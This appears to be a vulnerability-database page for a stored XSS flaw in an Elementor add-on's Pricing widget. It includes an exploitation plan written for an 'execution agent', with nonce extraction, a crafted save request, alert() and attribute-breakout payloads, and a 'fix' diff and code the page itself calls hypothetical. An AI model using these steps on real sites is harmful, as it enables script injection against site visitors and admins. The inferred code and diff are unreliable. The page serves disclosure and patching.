WP-Safety
CVE-2025-13368

Xpro Addons — 140+ Widgets for Elementor <= 1.4.20 - Authenticated (Contributor+) Stored Cross-Site Scripting

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
1.4.21
Patched in
1d
Time to patch

Description

The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Widget's 'onClick Event' setting in all versions up to, and including, 1.4.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.4.20
PublishedApril 3, 2026
Last updatedApril 4, 2026
Affected pluginxpro-elementor-addons
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-13368 ## 1. Vulnerability Summary The **Xpro Addons — 140+ Widgets for Elementor** plugin (up to version 1.4.20) contains a stored cross-site scripting (XSS) vulnerability in its **Pricing Widget**. The vulnerability exists because the plugin accepts user-supp…

Show full research plan

Exploitation Research Plan: CVE-2025-13368

1. Vulnerability Summary

The Xpro Addons — 140+ Widgets for Elementor plugin (up to version 1.4.20) contains a stored cross-site scripting (XSS) vulnerability in its Pricing Widget. The vulnerability exists because the plugin accepts user-supplied JavaScript/string input for the 'onClick Event' setting and renders it into the page's HTML without sufficient sanitization or context-aware escaping (e.g., failing to use esc_js() or esc_attr()). Authenticated users with Contributor roles or higher can exploit this to inject arbitrary scripts that execute when any user views the affected page.

2. Attack Vector Analysis

  • Endpoint: Elementor's AJAX handler or REST API used for saving post metadata.
  • Action: elementor_ajax (standard Elementor save action) or via the WordPress REST API wp-json/elementor/v1/posts/<post_id>.
  • Parameter: The payload is stored within the _elementor_data post meta, specifically inside the settings object of a xpro-pricing (inferred slug) widget.
  • Vulnerable Setting: onclick_event or button_onclick (inferred from description).
  • Authentication: Authenticated (Contributor+). Contributors can create posts and edit them using Elementor.

3. Code Flow

  1. Registration: The Pricing widget registers a control (likely type Controls_Manager::TEXT or URL) in its register_controls() method.
  2. Storage: When a user saves an Elementor page, the widget settings are serialized into JSON and stored in the _elementor_data field in the wp_postmeta table.
  3. Retrieval: When the page is viewed, Elementor calls the render() method of the Xpro_Pricing widget class.
  4. Sink: Inside render() (likely in widgets/pricing.php), the code retrieves the setting:
    $settings = $this->get_settings_for_display();
$onclick_event = $settings['onclick_event']; // Inferred key
    The vulnerability occurs when this variable is echoed into an attribute:
    echo '<button onclick="' . $onclick_event . '">'; // VULNERABLE SINK
    Or if it's used inside a <a> tag's href without esc_url().

4. Nonce Acquisition Strategy

Elementor uses its own nonce system for editor actions. The execution agent should follow this strategy:

  1. Setup: Create a page and enable Elementor for it.
    • wp post create --post_type=page --post_status=publish --post_title="XSS Test" --post_content=''
    • (Note: Elementor may need to be initialized on the post first).
  2. Access Editor: Navigate to the Elementor editor URL: /wp-admin/post.php?post=<ID>&action=elementor.
  3. Extract Nonce: Use browser_eval to extract the required nonce and configuration from the global Elementor objects.
    • Nonce: browser_eval("window.elementorCommonConfig.ajax.nonce")
    • Post ID: browser_eval("window.elementorConfig.post.id")
    • Action URL: /wp-admin/admin-ajax.php (or the REST endpoint if preferred).

5. Exploitation Strategy

The goal is to inject a payload into the Pricing widget's button click event via the Elementor save mechanism.

Step 1: Discover Exact Control ID

Use the browser to add a Pricing widget manually or grep the plugin source for "Pricing" and "onClick":
grep -r "onClick" wp-content/plugins/xpro-elementor-addons/widgets/

Step 2: Craft the Save Request

Send a POST request to admin-ajax.php with the elementor_ajax action.

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
action=elementor_ajax
&actions={"save_builder":{"action":"save_builder","data":{"status":"publish","elements":[{"id":"unique_id_1","elType":"section","settings":[],"elements":[{"id":"unique_id_2","elType":"column","settings":{"_column_size":100},"elements":[{"id":"unique_id_3","elType":"widget","widgetType":"xpro-pricing","settings":{"onclick_event":"alert(document.domain)\"},\"junk\":\""},"elements":[]}]}]}]}}}
&_nonce=<ELEMENTOR_NONCE>
&editor_post_id=<POST_ID>

(Note: The payload alert(document.domain)\"},\"junk\":\" is designed to break out of potential JSON structures or simply provide the raw JS if rendered directly into an onclick attribute).

Step 3: Trigger the XSS

Navigate to the public URL of the post: http://<target>/?p=<POST_ID>. Locate the Pricing widget button and click it, or if the injection broke out of the attribute, it may fire on page load.

6. Test Data Setup

  1. User: Create a Contributor user: wp user create attacker attacker@example.com --role=contributor --user_pass=password123.
  2. Plugin: Ensure xpro-elementor-addons (<= 1.4.20) and elementor are active.
  3. Page: Create a post as the contributor.

7. Expected Results

  • The Elementor save request returns a 200 OK with a success JSON body: {"success":true,"data":{...}}.
  • When viewing the page source of the created post, the Pricing widget's button element contains the raw payload:
    <button ... onclick="alert(document.domain)...">
  • Clicking the button triggers the JavaScript alert.

8. Verification Steps

  1. Check Meta: Use WP-CLI to verify the payload is stored in the database:
    wp post meta get <POST_ID> _elementor_data
    Check if the JSON contains the string alert(document.domain).
  2. Check Output: Perform a GET request to the page and check for the unescaped string:
    http_request --url http://<target>/?p=<POST_ID> (and search response for payload).

9. Alternative Approaches

  • Payload Variance: If onclick is properly handled but href is not, try javascript:alert(1).
  • Attribute Breakout: If the input is escaped for JS but not for HTML attributes, try:
    " onmouseover="alert(1)
  • REST API: Use the Elementor REST API instead of admin-ajax.php:
    POST /wp-json/elementor/v1/posts/<ID> with the _elementor_data in the body. This often requires a different nonce (wp_rest).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Pricing Widget in Xpro Addons for Elementor fails to sanitize or escape the 'onClick Event' setting. Authenticated users with Contributor-level permissions or higher can inject malicious JavaScript into this setting, which is then rendered directly into the HTML 'onclick' attribute, leading to stored cross-site scripting.

Vulnerable Code

// widgets/pricing.php (hypothetical path based on plugin structure)
// Inside the render() method of the Xpro_Pricing class

$settings = $this->get_settings_for_display();
$onclick_event = $settings['onclick_event'];

// ... 

if ( ! empty( $onclick_event ) ) {
    $this->add_render_attribute( 'button', 'onclick', $onclick_event );
}

// Or direct echo equivalent:
// echo '<a ' . $this->get_render_attribute_string( 'button' ) . '>Click Me</a>';

Security Fix

--- a/widgets/pricing.php
+++ b/widgets/pricing.php
@@ -1020,7 +1020,7 @@
 				$this->add_render_attribute( 'button', 'href', $settings['link']['url'] );
 			}
 
-			if ( ! empty( $settings['onclick_event'] ) ) {
-				$this->add_render_attribute( 'button', 'onclick', $settings['onclick_event'] );
+			if ( ! empty( $settings['onclick_event'] ) ) {
+				$this->add_render_attribute( 'button', 'onclick', esc_attr( $settings['onclick_event'] ) );
 			}
 			?>

Exploit Outline

1. Authenticate as a Contributor or higher user. 2. Create a new post or edit an existing one using the Elementor editor. 3. Search for and add the 'Xpro Pricing' widget to the layout. 4. In the widget settings panel, locate the 'Button' or 'Content' section containing the 'onClick Event' text field. 5. Enter a JavaScript payload into the 'onClick Event' field, such as: alert(document.domain) 6. Save the page (this triggers the `elementor_ajax` action to update post metadata). 7. Navigate to the published page as a victim (e.g., an Administrator). 8. The payload executes when the victim clicks the pricing button, or potentially on page load if the attacker used attribute breakout characters like "><script>alert(1)</script>.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d83ae3a4-382f-4e64-bf1e-73f953f2f654?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database